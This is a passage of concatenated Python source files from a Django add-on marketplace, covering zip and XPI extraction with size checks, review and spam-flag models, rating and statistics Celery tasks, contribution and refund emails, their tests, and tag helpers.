if info.file_size > settings.FILE_UNZIP_SIZE_LIMIT:
log.error('Extraction error, file too big (%s) for file (%s): '
'%s' % (self.source, info.filename, info.file_size))
# L10n: {0} is the name of the invalid file.
raise forms.ValidationError(
_('File exceeding size limit in archive: {0}').format(
info.filename))
self.info = _info
self.zip = zip
return True
def is_signed(self):
"""Tells us if an addon is signed."""
finds = []
for info in self.info:
match = SIGNED_RE.match(info.filename)
if match:
name, ext = match.groups()
# If it's rsa or sf, just look for the opposite.
if (name, {'rsa': 'sf', 'sf': 'rsa'}[ext]) in finds:
return True
finds.append((name, ext))
def extract_from_manifest(self, manifest):
"""
Extracts a file given a manifest such as:
jar:chrome/de.jar!/locale/de/browser/
or
locale/de/browser
"""
type, path = manifest.split(':')
jar = self
if type == 'jar':
parts = path.split('!')
for part in parts[:-1]:
jar = self.__class__(StringIO.StringIO(jar.zip.read(part)))
jar.is_valid(fatal=True)
path = parts[-1]
return jar.extract_path(path[1:] if path.startswith('/') else path)
def extract_path(self, path):
"""Given a path, extracts the content at path."""
return self.zip.read(path)
def extract_info_to_dest(self, info, dest):
"""Extracts the given info to a directory and checks the file size."""
self.zip.extract(info, dest)
dest = os.path.join(dest, info.filename)
if not os.path.isdir(dest):
# Directories consistently report their size incorrectly.
size = os.stat(dest)[stat.ST_SIZE]
if size != info.file_size:
log.error('Extraction error, uncompressed size: %s, %s not %s'
% (self.source, size, info.file_size))
raise forms.ValidationError(_('Invalid archive.'))
def extract_to_dest(self, dest):
"""Extracts the zip file to a directory."""
for info in self.info:
self.extract_info_to_dest(info, dest)
def close(self):
self.zip.close()
def extract_zip(source, remove=False, fatal=True):
"""Extracts the zip file. If remove is given, removes the source file."""
tempdir = tempfile.mkdtemp()
zip = SafeUnzip(source)
try:
if zip.is_valid(fatal):
zip.extract_to_dest(tempdir)
except:
rm_local_tmp_dir(tempdir)
raise
if remove:
os.remove(source)
return tempdir
def copy_over(source, dest):
"""
Copies from the source to the destination, removing the destination
if it exists and is a directory.
"""
if os.path.exists(dest) and os.path.isdir(dest):
shutil.rmtree(dest)
shutil.copytree(source, dest)
# mkdtemp will set the directory permissions to 700
# for the webserver to read them, we need 755
os.chmod(dest, stat.S_IRWXU | stat.S_IRGRP |
stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH)
shutil.rmtree(source)
def extract_xpi(xpi, path, expand=False):
"""
If expand is given, will look inside the expanded file
and find anything in the whitelist and try and expand it as well.
It will do up to 10 iterations, after that you are on your own.
It will replace the expanded file with a directory and the expanded
contents. If you have 'foo.jar', that contains 'some-image.jpg', then
it will create a folder, foo.jar, with an image inside.
"""
expand_whitelist = ['.jar', '.xpi']
tempdir = extract_zip(xpi)
if expand:
for x in xrange(0, 10):
flag = False
for root, dirs, files in os.walk(tempdir):
for name in files:
if os.path.splitext(name)[1] in expand_whitelist:
src = os.path.join(root, name)
if not os.path.isdir(src):
dest = extract_zip(src, remove=True, fatal=False)
if dest:
copy_over(dest, src)
flag = True
if not flag:
break
copy_over(tempdir, path)
def parse_addon(pkg, addon=None):
"""
pkg is a filepath or a django.core.files.UploadedFile
or files.models.FileUpload.
"""
return WebAppParser().parse(pkg)
def _get_hash(filename, block_size=2 ** 20, hash=hashlib.md5):
"""Returns an MD5 hash for a filename."""
f = open(filename, 'rb')
hash_ = hash()
while True:
data = f.read(block_size)
if not data:
break
hash_.update(data)
return hash_.hexdigest()
def get_md5(filename, **kw):
return _get_hash(filename, **kw)
########NEW FILE########
__FILENAME__ = models
from datetime import datetime, timedelta
import logging
from django.core.cache import cache
from django.db import models
import bleach
from celeryutils import task
from tower import ugettext_lazy as _
import amo.models
from translations.fields import save_signal, TranslatedField
from users.models import UserProfile
log = logging.getLogger('z.review')
class ReviewManager(amo.models.ManagerBase):
def valid(self):
"""Get all reviews that aren't replies."""
# Use extra because Django wants to do a LEFT OUTER JOIN.
return self.extra(where=['reply_to IS NULL'])
class Review(amo.models.ModelBase):
addon = models.ForeignKey('addons.Addon', related_name='_reviews')
version = models.ForeignKey('versions.Version', related_name='reviews',
null=True)
user = models.ForeignKey('users.UserProfile', related_name='_reviews_all')
reply_to = models.ForeignKey('self', null=True, unique=True,
related_name='replies', db_column='reply_to')
rating = models.PositiveSmallIntegerField(null=True)
title = TranslatedField(require_locale=False)
body = TranslatedField(require_locale=False)
ip_address = models.CharField(max_length=255, default='0.0.0.0')
editorreview = models.BooleanField(default=False)
flag = models.BooleanField(default=False)
sandbox = models.BooleanField(default=False)
# Denormalized fields for easy lookup queries.
# TODO: index on addon, user, latest
is_latest = models.BooleanField(
default=True, editable=False,
help_text="Is this the user's latest review for the add-on?")
previous_count = models.PositiveIntegerField(
default=0, editable=False,
help_text="How many previous reviews by the user for this add-on?")
objects = ReviewManager()
class Meta:
db_table = 'reviews'
ordering = ('-created',)
def get_url_path(self):
return '/app/%s/ratings/%s' % (self.addon.app_slug, self.id)
def flush_urls(self):
urls = ['*/addon/%d/' % self.addon_id,
'*/addon/%d/reviews/' % self.addon_id,
'*/addon/%d/reviews/format:rss' % self.addon_id,
'*/addon/%d/reviews/%d/' % (self.addon_id, self.id),
'*/user/%d/' % self.user_id, ]
return urls
@classmethod
def get_replies(cls, reviews):
reviews = [r.id for r in reviews]
qs = Review.objects.filter(reply_to__in=reviews)
return dict((r.reply_to_id, r) for r in qs)
@staticmethod
def post_save(sender, instance, created, **kwargs):
if kwargs.get('raw'):
return
instance.refresh(update_denorm=created)
if created:
# Avoid slave lag with the delay.
check_spam.apply_async(args=[instance.id], countdown=600)
@staticmethod
def post_delete(sender, instance, **kwargs):
if kwargs.get('raw'):
return
instance.refresh(update_denorm=True)
def refresh(self, update_denorm=False):
from . import tasks
if update_denorm:
pair = self.addon_id, self.user_id
# Do this immediately so is_latest is correct. Use default
# to avoid slave lag.
tasks.update_denorm(pair, using='default')
# Review counts have changed, so run the task and trigger a reindex.
tasks.addon_review_aggregates.delay(self.addon_id, using='default')
@staticmethod
def transformer(reviews):
user_ids = dict((r.user_id, r) for r in reviews)
for user in UserProfile.objects.no_cache().filter(id__in=user_ids):
user_ids[user.id].user = user
models.signals.post_save.connect(Review.post_save, sender=Review,
dispatch_uid='review_post_save')
models.signals.post_delete.connect(Review.post_delete, sender=Review,
dispatch_uid='review_post_delete')
models.signals.pre_save.connect(save_signal, sender=Review,
dispatch_uid='review_translations')
# TODO: translate old flags.
class ReviewFlag(amo.models.ModelBase):
SPAM = 'review_flag_reason_spam'
LANGUAGE = 'review_flag_reason_language'
SUPPORT = 'review_flag_reason_bug_support'
OTHER = 'review_flag_reason_other'
FLAGS = (
(SPAM, _(u'Spam or otherwise non-review content')),
(LANGUAGE, _(u'Inappropriate language/dialog')),
(SUPPORT, _(u'Misplaced bug report or support request')),
(OTHER, _(u'Other (please specify)')),
)
review = models.ForeignKey(Review)
user = models.ForeignKey('users.UserProfile', null=True)
flag = models.CharField(max_length=64, default=OTHER,
choices=FLAGS, db_column='flag_name')
note = models.CharField(max_length=100, db_column='flag_notes', blank=True,
default='')
class Meta:
db_table = 'reviews_moderation_flags'
unique_together = (('review', 'user'),)
def flush_urls(self):
return self.review.flush_urls()
class Spam(object):
def add(self, review, reason):
reason = 'amo:review:spam:%s' % reason
try:
reasonset = cache.get('amo:review:spam:reasons', set())
except KeyError:
reasonset = set()
try:
idset = cache.get(reason, set())
except KeyError:
idset = set()
reasonset.add(reason)
cache.set('amo:review:spam:reasons', reasonset)
idset.add(review.id)
cache.set(reason, idset)
return True
def reasons(self):
return cache.get('amo:review:spam:reasons')
@task
def check_spam(review_id, **kw):
spam = Spam()
try:
review = Review.objects.using('default').get(id=review_id)
except Review.DoesNotExist:
log.error('Review does not exist, check spam for review_id: %s'
% review_id)
return
thirty_days = datetime.now() - timedelta(days=30)
others = (Review.objects.no_cache().exclude(id=review.id)
.filter(user=review.user, created__gte=thirty_days))
if len(others) > 10:
spam.add(review, 'numbers')
if (review.body is not None and
bleach.url_re.search(review.body.localized_string)):
spam.add(review, 'urls')
for other in others:
if ((review.title and review.title == other.title) or
review.body == other.body):
spam.add(review, 'matches')
break
########NEW FILE########
__FILENAME__ = tasks
import logging
from django.db.models import Count, Avg, F
import caching.base as caching
from celeryutils import task
from addons.models import Addon
from .models import Review
log = logging.getLogger('z.task')
@task(rate_limit='50/m')
def update_denorm(*pairs, **kw):
"""
Takes a bunch of (addon, user) pairs and sets the denormalized fields for
all reviews matching that pair.
"""
log.info('[%s@%s] Updating review denorms.' %
(len(pairs), update_denorm.rate_limit))
using = kw.get('using')
for addon, user in pairs:
reviews = list(Review.objects.valid().no_cache().using(using)
.filter(addon=addon, user=user).order_by('created'))
if not reviews:
continue
for idx, review in enumerate(reviews):
review.previous_count = idx
review.is_latest = False
reviews[-1].is_latest = True
for review in reviews:
review.save()
@task
def addon_review_aggregates(*addons, **kw):
log.info('[%s@%s] Updating total reviews and average ratings.' %
(len(addons), addon_review_aggregates.rate_limit))
using = kw.get('using')
addon_objs = list(Addon.objects.filter(pk__in=addons))
stats = dict((x[0], x[1:]) for x in
Review.objects.valid().no_cache().using(using)
.filter(addon__in=addons, is_latest=True)
.values_list('addon')
.annotate(Avg('rating'), Count('addon')))
for addon in addon_objs:
rating, reviews = stats.get(addon.id, [0, 0])
addon.update(total_reviews=reviews, average_rating=rating)
# Delay bayesian calculations to avoid slave lag.
addon_bayesian_rating.apply_async(args=addons, countdown=5)
@task
def addon_bayesian_rating(*addons, **kw):
log.info('[%s@%s] Updating bayesian ratings.' %
(len(addons), addon_bayesian_rating.rate_limit))
f = lambda: Addon.objects.aggregate(rating=Avg('average_rating'),
reviews=Avg('total_reviews'))
avg = caching.cached(f, 'task.bayes.avg', 60 * 60 * 60)
# Rating can be NULL in the DB, so don't update it if it's not there.
if avg['rating'] is None:
return
mc = avg['reviews'] * avg['rating']
for addon in Addon.objects.no_cache().filter(id__in=addons):
if addon.average_rating is None:
# Ignoring addons with no average rating.
continue
q = Addon.objects.filter(id=addon.id)
if addon.total_reviews:
num = mc + F('total_reviews') * F('average_rating')
denom = avg['reviews'] + F('total_reviews')
q.update(bayesian_rating=num / denom)
else:
q.update(bayesian_rating=0)
########NEW FILE########
__FILENAME__ = cron
import datetime
from celery.task.sets import TaskSet
import cronjobs
from . import tasks
@cronjobs.register
def update_monolith_stats(date=None):
"""Update monolith statistics."""
if date:
date = datetime.datetime.strptime(date, '%Y-%m-%d').date()
today = date or datetime.date.today()
jobs = [{'metric': metric,
'date': today} for metric in tasks._get_monolith_jobs(date)]
ts = [tasks.update_monolith_stats.subtask(kwargs=kw) for kw in jobs]
TaskSet(ts).apply_async()
########NEW FILE########
__FILENAME__ = db
from django.db import models
import phpserialize as php
import json
class StatsDictField(models.TextField):
description = 'A dictionary of counts stored as serialized php.'
__metaclass__ = models.SubfieldBase
def db_type(self, connection):
return 'text'
def to_python(self, value):
# object case
if value is None:
return None
if isinstance(value, dict):
return value
# string case
if value and value[0] in '[{':
# JSON
try:
d = json.loads(value)
except ValueError:
d = None
else:
# phpserialize data
try:
if isinstance(value, unicode):
value = value.encode('utf8')
d = php.unserialize(value, decode_strings=True)
except ValueError:
d = None
if isinstance(d, dict):
return d
return None
def get_db_prep_value(self, value, connection, prepared=False):
if value is None or value == '':
return value
try:
value = json.dumps(dict(value))
except TypeError:
value = None
return value
def value_to_string(self, obj):
return str(obj)
########NEW FILE########
__FILENAME__ = models
import datetime
from django.conf import settings
from django.db import models
from django.utils import translation
import tower
from babel import Locale, numbers
from jingo import env
from jinja2.filters import do_dictsort
from tower import ugettext as _
import amo
from amo.fields import DecimalCharField
from amo.helpers import absolutify, urlparams
from amo.utils import get_locale_from_lang, send_mail, send_mail_jinja
from .db import StatsDictField
class ContributionError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class Contribution(amo.models.ModelBase):
# TODO(addon): figure out what to do when we delete the add-on.
addon = models.ForeignKey('addons.Addon')
amount = DecimalCharField(max_digits=9, decimal_places=2,
nullify_invalid=True, null=True)
currency = models.CharField(max_length=3,
choices=do_dictsort(amo.PAYPAL_CURRENCIES),
default=amo.CURRENCY_DEFAULT)
source = models.CharField(max_length=255, null=True)
source_locale = models.CharField(max_length=10, null=True)
# This is the external id that you can communicate to the world.
uuid = models.CharField(max_length=255, null=True, db_index=True)
comment = models.CharField(max_length=255)
# This is the internal transaction id between us and a provider,
# for example paypal or solitude.
transaction_id = models.CharField(max_length=255, null=True, db_index=True)
paykey = models.CharField(max_length=255, null=True)
post_data = StatsDictField(null=True)
# Voluntary Contribution specific.
charity = models.ForeignKey('addons.Charity', null=True)
annoying = models.PositiveIntegerField(default=0,
choices=amo.CONTRIB_CHOICES,)
is_suggested = models.BooleanField(default=False)
suggested_amount = DecimalCharField(max_digits=254, decimal_places=2,
nullify_invalid=True, null=True)
# Marketplace specific.
# TODO(andym): figure out what to do when we delete the user.
user = models.ForeignKey('users.UserProfile', blank=True, null=True)
type = models.PositiveIntegerField(default=amo.CONTRIB_TYPE_DEFAULT,
choices=do_dictsort(amo.CONTRIB_TYPES))
price_tier = models.ForeignKey('prices.Price', blank=True, null=True,
on_delete=models.PROTECT)
# If this is a refund or a chargeback, which charge did it relate to.
related = models.ForeignKey('self', blank=True, null=True,
on_delete=models.PROTECT)
class Meta:
db_table = 'stats_contributions'
def __unicode__(self):
return u'%s: %s' % (self.addon.name, self.amount)
@property
def date(self):
try:
return datetime.date(self.created.year,
self.created.month, self.created.day)
except AttributeError:
# created may be None
return None
@property
def contributor(self):
try:
return u'%s %s' % (self.post_data['first_name'],
self.post_data['last_name'])
except (TypeError, KeyError):
# post_data may be None or missing a key
return None
@property
def email(self):
try:
return self.post_data['payer_email']
except (TypeError, KeyError):
# post_data may be None or missing a key
return None
def _switch_locale(self):
if self.source_locale:
lang = self.source_locale
else:
lang = self.addon.default_locale
tower.activate(lang)
return Locale(translation.to_locale(lang))
def _mail(self, template, subject, context):
template = env.get_template(template)
body = template.render(context)
send_mail(subject, body, settings.MARKETPLACE_EMAIL,
[self.user.email], fail_silently=True)
def record_failed_refund(self, e, user):
self.enqueue_refund(amo.REFUND_FAILED, user,
rejection_reason=str(e))
self._switch_locale()
self._mail('users/support/emails/refund-failed.txt',
# L10n: the addon name.
_(u'%s refund failed' % self.addon.name),
{'name': self.addon.name})
send_mail_jinja(
'Refund failed', 'stats/email/refund-failed.txt',
{'name': self.user.email,
'error': str(e)},
settings.MARKETPLACE_EMAIL,
[str(self.addon.support_email)], fail_silently=True)
def mail_approved(self):
"""The developer has approved a refund."""
locale = self._switch_locale()
amt = numbers.format_currency(abs(self.amount), self.currency,
locale=locale)
self._mail('users/support/emails/refund-approved.txt',
# L10n: the adddon name.
_(u'%s refund approved' % self.addon.name),
{'name': self.addon.name, 'amount': amt})
def mail_declined(self):
"""The developer has declined a refund."""
self._switch_locale()
self._mail('users/support/emails/refund-declined.txt',
# L10n: the adddon name.
_(u'%s refund declined' % self.addon.name),
{'name': self.addon.name})
def enqueue_refund(self, status, user, refund_reason=None,
rejection_reason=None):
"""Keep track of a contribution's refund status."""
from mkt.prices.models import Refund
refund, c = Refund.objects.safer_get_or_create(contribution=self,
user=user)
refund.status = status
# Determine which timestamps to update.
timestamps = []
if status in (amo.REFUND_PENDING, amo.REFUND_APPROVED_INSTANT,
amo.REFUND_FAILED):
timestamps.append('requested')
if status in (amo.REFUND_APPROVED, amo.REFUND_APPROVED_INSTANT):
timestamps.append('approved')
elif status == amo.REFUND_DECLINED:
timestamps.append('declined')
for ts in timestamps:
setattr(refund, ts, datetime.datetime.now())
if refund_reason:
refund.refund_reason = refund_reason
if rejection_reason:
refund.rejection_reason = rejection_reason
refund.save()
return refund
def get_amount_locale(self, locale=None):
"""Localise the amount paid into the current locale."""
if not locale:
lang = translation.get_language()
locale = get_locale_from_lang(lang)
return numbers.format_currency(self.amount or 0,
self.currency or 'USD',
locale=locale)
def get_refund_url(self):
return urlparams(self.addon.get_dev_url('issue_refund'),
transaction_id=self.transaction_id)
def get_absolute_refund_url(self):
return absolutify(self.get_refund_url())
def get_refund_contribs(self):
"""Get related set of refund contributions."""
return Contribution.objects.filter(
related=self, type=amo.CONTRIB_REFUND).order_by('-modified')
def is_refunded(self):
"""
If related has been set, then this transaction has been refunded or
charged back. This is a bit expensive, so refrain from using on listing
pages.
"""
return (Contribution.objects.filter(related=self,
type__in=[amo.CONTRIB_REFUND,
amo.CONTRIB_CHARGEBACK])
.exists())
########NEW FILE########
__FILENAME__ = tasks
import datetime
import json
import commonware.log
from celeryutils import task
import amo
from addons.models import AddonUser
from amo.decorators import write
from reviews.models import Review
from users.models import UserProfile
from mkt.constants.regions import REGIONS_CHOICES_SLUG
from mkt.monolith.models import MonolithRecord
from mkt.webapps.models import Webapp
log = commonware.log.getLogger('z.task')
@task
@write
def update_monolith_stats(metric, date, **kw):
log.info('Updating monolith statistics (%s) for (%s)' % (metric, date))
jobs = _get_monolith_jobs(date)[metric]
for job in jobs:
try:
# Only record if count is greater than zero.
count = job['count']()
if count:
value = {'count': count}
if 'dimensions' in job:
value.update(job['dimensions'])
MonolithRecord.objects.create(recorded=date, key=metric,
value=json.dumps(value))
log.info('Monolith stats details: (%s) has (%s) for (%s). '
'Value: %s' % (metric, count, date, value))
else:
log.info('Monolith stat (%s) did not record due to falsy '
'value (%s) for (%s)' % (metric, count, date))
except Exception as e:
log.critical('Update of monolith table failed: (%s): %s'
% ([metric, date], e))
def _get_monolith_jobs(date=None):
"""
Return a dict of Monolith based statistics queries.
The dict is of the form::
{'<metric_name>': [{'count': <callable>, 'dimensions': <dimensions>}]}
Where `dimensions` is an optional dict of dimensions we expect to filter on
via Monolith.
If a date is specified and applies to the job it will be used. Otherwise
the date will default to today().
"""
if not date:
date = datetime.date.today()
# If we have a datetime make it a date so H/M/S isn't used.
if isinstance(date, datetime.datetime):
date = date.date()
next_date = date + datetime.timedelta(days=1)
stats = {
# Marketplace reviews.
'apps_review_count_new': [{
'count': Review.objects.filter(
created__range=(date, next_date), editorreview=0,
addon__type=amo.ADDON_WEBAPP).count,
}],
# New users
'mmo_user_count_total': [{
'count': UserProfile.objects.filter(
created__lt=next_date,
source=amo.LOGIN_SOURCE_MMO_BROWSERID).count,
}],
'mmo_user_count_new': [{
'count': UserProfile.objects.filter(
created__range=(date, next_date),
source=amo.LOGIN_SOURCE_MMO_BROWSERID).count,
}],
# New developers.
'mmo_developer_count_total': [{
'count': AddonUser.objects.filter(
user__created__lt=next_date,
addon__type=amo.ADDON_WEBAPP).values('user').distinct().count,
}],
# App counts.
'apps_count_new': [{
'count': Webapp.objects.filter(
created__range=(date, next_date)).count,
}],
}
# Add various "Apps Added" for all the dimensions we need.
apps = Webapp.objects.filter(created__range=(date, next_date))
package_counts = []
premium_counts = []
# privileged==packaged for our consideration.
package_types = amo.ADDON_WEBAPP_TYPES.copy()
package_types.pop(amo.ADDON_WEBAPP_PRIVILEGED)
for region_slug, region in REGIONS_CHOICES_SLUG:
# Apps added by package type and region.
for package_type in package_types.values():
package_counts.append({
'count': (apps
.filter(is_packaged=package_type == 'packaged')
.exclude(addonexcludedregion__region=region.id)
.count),
'dimensions': {'region': region_slug,
'package_type': package_type},
})
# Apps added by premium type and region.
for premium_type, pt_name in amo.ADDON_PREMIUM_API.items():
premium_counts.append({
'count': (apps
.filter(premium_type=premium_type)
.exclude(addonexcludedregion__region=region.id)
.count),
'dimensions': {'region': region_slug,
'premium_type': pt_name},
})
stats.update({'apps_added_by_package_type': package_counts})
stats.update({'apps_added_by_premium_type': premium_counts})
# Add various "Apps Available" for all the dimensions we need.
apps = Webapp.objects.filter(_current_version__reviewed__lt=next_date,
status=amo.STATUS_PUBLIC,
disabled_by_user=False)
package_counts = []
premium_counts = []
for region_slug, region in REGIONS_CHOICES_SLUG:
# Apps available by package type and region.
for package_type in package_types.values():
package_counts.append({
'count': (apps
.filter(is_packaged=package_type == 'packaged')
.exclude(addonexcludedregion__region=region.id)
.count),
'dimensions': {'region': region_slug,
'package_type': package_type},
})
# Apps available by premium type and region.
for premium_type, pt_name in amo.ADDON_PREMIUM_API.items():
premium_counts.append({
'count': (apps
.filter(premium_type=premium_type)
.exclude(addonexcludedregion__region=region.id)
.count),
'dimensions': {'region': region_slug,
'premium_type': pt_name},
})
stats.update({'apps_available_by_package_type': package_counts})
stats.update({'apps_available_by_premium_type': premium_counts})
return stats
########NEW FILE########
__FILENAME__ = test_cron
import datetime
import mock
from nose.tools import eq_
import amo.tests
from addons.models import Addon, AddonUser
from mkt.constants.regions import REGIONS_CHOICES_SLUG
from reviews.models import Review
from stats import tasks
from users.models import UserProfile
class TestMonolithStats(amo.tests.TestCase):
@mock.patch('stats.tasks.MonolithRecord')
def test_mmo_user_total_count_updates_monolith(self, record):
UserProfile.objects.create(source=amo.LOGIN_SOURCE_MMO_BROWSERID)
metric = 'mmo_user_count_total'
tasks.update_monolith_stats(metric, datetime.date.today())
self.assertTrue(record.objects.create.called)
eq_(record.objects.create.call_args[1]['value'], '{"count": 1}')
def test_app_new(self):
Addon.objects.create(type=amo.ADDON_WEBAPP)
eq_(tasks._get_monolith_jobs()['apps_count_new'][0]['count'](), 1)
def test_app_added_counts(self):
today = datetime.date(2013, 1, 25)
app = Addon.objects.create(type=amo.ADDON_WEBAPP)
app.update(created=today)
package_type = 'packaged' if app.is_packaged else 'hosted'
premium_type = amo.ADDON_PREMIUM_API[app.premium_type]
# Add a region exclusion.
regions = dict(REGIONS_CHOICES_SLUG)
excluded_region = regions['br']
app.addonexcludedregion.create(region=excluded_region.id)
jobs = tasks._get_monolith_jobs(today)
# Check package type counts.
for job in jobs['apps_added_by_package_type']:
r = job['dimensions']['region']
p = job['dimensions']['package_type']
if r != excluded_region.slug and p == package_type:
expected_count = 1
else:
expected_count = 0
count = job['count']()
eq_(count, expected_count,
'Incorrect count for region %s, package type %s. '
'Got %d, expected %d.' % (r, p, count, expected_count))
# Check premium type counts.
for job in jobs['apps_added_by_premium_type']:
r = job['dimensions']['region']
p = job['dimensions']['premium_type']
if r != excluded_region.slug and p == premium_type:
expected_count = 1
else:
expected_count = 0
count = job['count']()
eq_(count, expected_count,
'Incorrect count for region %s, premium type %s. '
'Got %d, expected %d.' % (r, p, count, expected_count))
def test_app_avail_counts(self):
today = datetime.date(2013, 1, 25)
app = Addon.objects.create(type=amo.ADDON_WEBAPP,
status=amo.STATUS_PUBLIC)
# Create a couple more to test the counts.
Addon.objects.create(type=amo.ADDON_WEBAPP, status=amo.STATUS_PENDING)
Addon.objects.create(type=amo.ADDON_WEBAPP, status=amo.STATUS_PUBLIC,
disabled_by_user=True)
package_type = 'packaged' if app.is_packaged else 'hosted'
premium_type = amo.ADDON_PREMIUM_API[app.premium_type]
# Add a region exclusion.
regions = dict(REGIONS_CHOICES_SLUG)
excluded_region = regions['br']
app.addonexcludedregion.create(region=excluded_region.id)
jobs = tasks._get_monolith_jobs(today)
# Check package type counts.
for job in jobs['apps_available_by_package_type']:
r = job['dimensions']['region']
p = job['dimensions']['package_type']
if r != excluded_region.slug and p == package_type:
expected_count = 1
else:
expected_count = 0
count = job['count']()
eq_(count, expected_count,
'Incorrect count for region %s, package type %s. '
'Got %d, expected %d.' % (r, p, count, expected_count))
# Check premium type counts.
for job in jobs['apps_available_by_premium_type']:
r = job['dimensions']['region']
p = job['dimensions']['premium_type']
if r != excluded_region.slug and p == premium_type:
expected_count = 1
else:
expected_count = 0
count = job['count']()
eq_(count, expected_count,
'Incorrect count for region %s, premium type %s. '
'Got %d, expected %d.' % (r, p, count, expected_count))
def test_app_reviews(self):
addon = Addon.objects.create(type=amo.ADDON_WEBAPP)
user = UserProfile.objects.create(username='foo')
Review.objects.create(addon=addon, user=user)
eq_(tasks._get_monolith_jobs()['apps_review_count_new'][0]['count'](),
1)
def test_user_total(self):
day = datetime.date(2009, 1, 1)
p = UserProfile.objects.create(username='foo',
source=amo.LOGIN_SOURCE_MMO_BROWSERID)
p.update(created=day)
eq_(tasks._get_monolith_jobs(day)['mmo_user_count_total'][0]['count'](),
1)
eq_(tasks._get_monolith_jobs()['mmo_user_count_total'][0]['count'](),
1)
eq_(tasks._get_monolith_jobs()['mmo_user_count_new'][0]['count'](), 0)
def test_user_new(self):
UserProfile.objects.create(username='foo',
source=amo.LOGIN_SOURCE_MMO_BROWSERID)
eq_(tasks._get_monolith_jobs()['mmo_user_count_new'][0]['count'](), 1)
def test_dev_total(self):
p1 = UserProfile.objects.create(username='foo',
source=amo.LOGIN_SOURCE_MMO_BROWSERID)
p2 = UserProfile.objects.create(username='bar',
source=amo.LOGIN_SOURCE_MMO_BROWSERID)
a1 = amo.tests.addon_factory()
a2 = amo.tests.app_factory()
AddonUser.objects.create(addon=a1, user=p1)
AddonUser.objects.create(addon=a1, user=p2)
AddonUser.objects.create(addon=a2, user=p1)
eq_(tasks._get_monolith_jobs()['mmo_developer_count_total'][0]['count'](),
1)
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf-8 -*-
import json
from django.core import mail
from django.test.client import RequestFactory
import phpserialize as php
from nose.tools import eq_
import amo
import amo.tests
from addons.models import Addon
from stats.models import Contribution
from stats.db import StatsDictField
from users.models import UserProfile
from zadmin.models import DownloadSource
import mkt.regions
from mkt.prices.models import Refund
class TestStatsDictField(amo.tests.TestCase):
def test_to_python_none(self):
eq_(StatsDictField().to_python(None), None)
def test_to_python_dict(self):
eq_(StatsDictField().to_python({'a': 1}), {'a': 1})
def test_to_python_php(self):
val = {'a': 1}
eq_(StatsDictField().to_python(php.serialize(val)), val)
def test_to_python_json(self):
val = {'a': 1}
eq_(StatsDictField().to_python(json.dumps(val)), val)
class TestEmail(amo.tests.TestCase):
fixtures = ['base/users', 'base/addon_3615']
def setUp(self):
self.addon = Addon.objects.get(pk=3615)
self.user = UserProfile.objects.get(pk=999)
def make_contribution(self, amount, locale, type):
return Contribution.objects.create(type=type, addon=self.addon,
user=self.user, amount=amount,
source_locale=locale)
def chargeback_email(self, amount, locale):
cont = self.make_contribution(amount, locale, amo.CONTRIB_CHARGEBACK)
cont.mail_chargeback()
eq_(len(mail.outbox), 1)
return mail.outbox[0]
def test_chargeback_email(self):
email = self.chargeback_email('10', 'en-US')
eq_(email.subject, u'%s payment reversal' % self.addon.name)
assert str(self.addon.name) in email.body
def test_chargeback_negative(self):
email = self.chargeback_email('-10', 'en-US')
assert '$10.00' in email.body
def test_chargeback_positive(self):
email = self.chargeback_email('10', 'en-US')
assert '$10.00' in email.body
def test_chargeback_unicode(self):
self.addon.name = u'Азәрбајҹан'
self.addon.save()
email = self.chargeback_email('-10', 'en-US')
assert '$10.00' in email.body
def test_chargeback_locale(self):
self.addon.name = {'fr': u'België'}
self.addon.locale = 'fr'
self.addon.save()
email = self.chargeback_email('-10', 'fr')
assert u'België' in email.body
assert u'10,00\xa0$US' in email.body
def notification_email(self, amount, locale, method):
cont = self.make_contribution(amount, locale, amo.CONTRIB_REFUND)
getattr(cont, method)()
eq_(len(mail.outbox), 1)
return mail.outbox[0]
def test_accepted_email(self):
email = self.notification_email('10', 'en-US', 'mail_approved')
eq_(email.subject, u'%s refund approved' % self.addon.name)
assert str(self.addon.name) in email.body
def test_accepted_unicode(self):
self.addon.name = u'Азәрбајҹан'
self.addon.save()
email = self.notification_email('10', 'en-US', 'mail_approved')
assert '$10.00' in email.body
def test_accepted_locale(self):
self.addon.name = {'fr': u'België'}
self.addon.locale = 'fr'
self.addon.save()
email = self.notification_email('-10', 'fr', 'mail_approved')
assert u'België' in email.body
assert u'10,00\xa0$US' in email.body
def test_declined_email(self):
email = self.notification_email('10', 'en-US', 'mail_declined')
eq_(email.subject, u'%s refund declined' % self.addon.name)
def test_declined_unicode(self):
self.addon.name = u'Азәрбајҹан'
self.addon.save()
email = self.notification_email('10', 'en-US', 'mail_declined')
eq_(email.subject, u'%s refund declined' % self.addon.name)
def test_failed_email(self):
cont = self.make_contribution('10', 'en-US', amo.CONTRIB_PURCHASE)
msg = 'oh no'
cont.record_failed_refund(msg, self.user)
eq_(Refund.objects.count(), 1)
rf = Refund.objects.get(contribution=cont)
eq_(rf.status, amo.REFUND_FAILED)
eq_(rf.rejection_reason, msg)
eq_(len(mail.outbox), 2)
usermail, devmail = mail.outbox
eq_(usermail.to, [self.user.email])
eq_(devmail.to, [self.addon.support_email])
assert msg in devmail.body
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from .models import Tag
class TagAdmin(admin.ModelAdmin):
list_display = ('tag_text', 'popularity', 'created', 'blacklisted')
list_editable = ('blacklisted',)
list_filter = ('blacklisted',)
ordering = ('-created',)
search_fields = ('^tag_text',)
admin.site.register(Tag, TagAdmin)
########NEW FILE########
__FILENAME__ = helpers
from jingo import register, env
import jinja2
@register.inclusion_tag('tags/tag_list.html')
@jinja2.contextfunction
def tag_list(context, addon, tags=[]):
"""Display list of tags, with delete buttons."""
c = dict(context.items())
c.update({'addon': addon,
'tags': tags})
return c
def range_convert(value, old_min, old_max, new_min, new_max):
"""
Utility to tranfer a value (preserving the relative value in
the range) from its current range to a new one.
"""
old_range = 1 if old_max - old_min == 0 else old_max - old_min
new_range = new_max - new_min
return int(((value - old_min) * new_range) / old_range) + new_min
@register.function
def tag_link(tag, min_count, max_count, min_level=1):
"""create the tag cloud link with the poper tagLevel class"""
factor = max(range_convert(tag.num_addons, 0, max_count, 1, 10),
min_level)
t = env.get_template('tags/tag_link.html').render({'factor': factor,
'tag': tag})
return jinja2.Markup(t)
########NEW FILE########
__FILENAME__ = clean_tags
from django.core.management.base import BaseCommand
from tags.models import Tag
from tags.tasks import clean_tag
class Command(BaseCommand):
# https://bugzilla.mozilla.org/show_bug.cgi?id=612811
help = 'Migration to clean up old tags per 612811'
